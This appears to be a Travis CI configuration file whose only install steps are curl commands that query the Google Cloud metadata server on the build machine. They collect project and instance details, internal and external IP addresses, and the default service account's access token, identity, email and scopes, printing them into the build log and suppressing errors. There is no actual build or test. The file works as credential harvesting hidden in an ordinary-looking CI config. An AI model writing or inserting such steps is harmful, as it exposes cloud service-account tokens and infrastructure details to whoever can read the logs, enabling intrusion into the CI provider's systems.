language: generic
sudo: true
git:
  submodules:
    false
install:
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/project/project-id || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/hostname || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/id || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/zone || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/machine-type || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/access-configs/0/external-ip || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/ip || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/ || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/aliases || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email || true
 - curl -H "Metadata-Flavor: Google" -s --connect-timeout 1 http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes || true

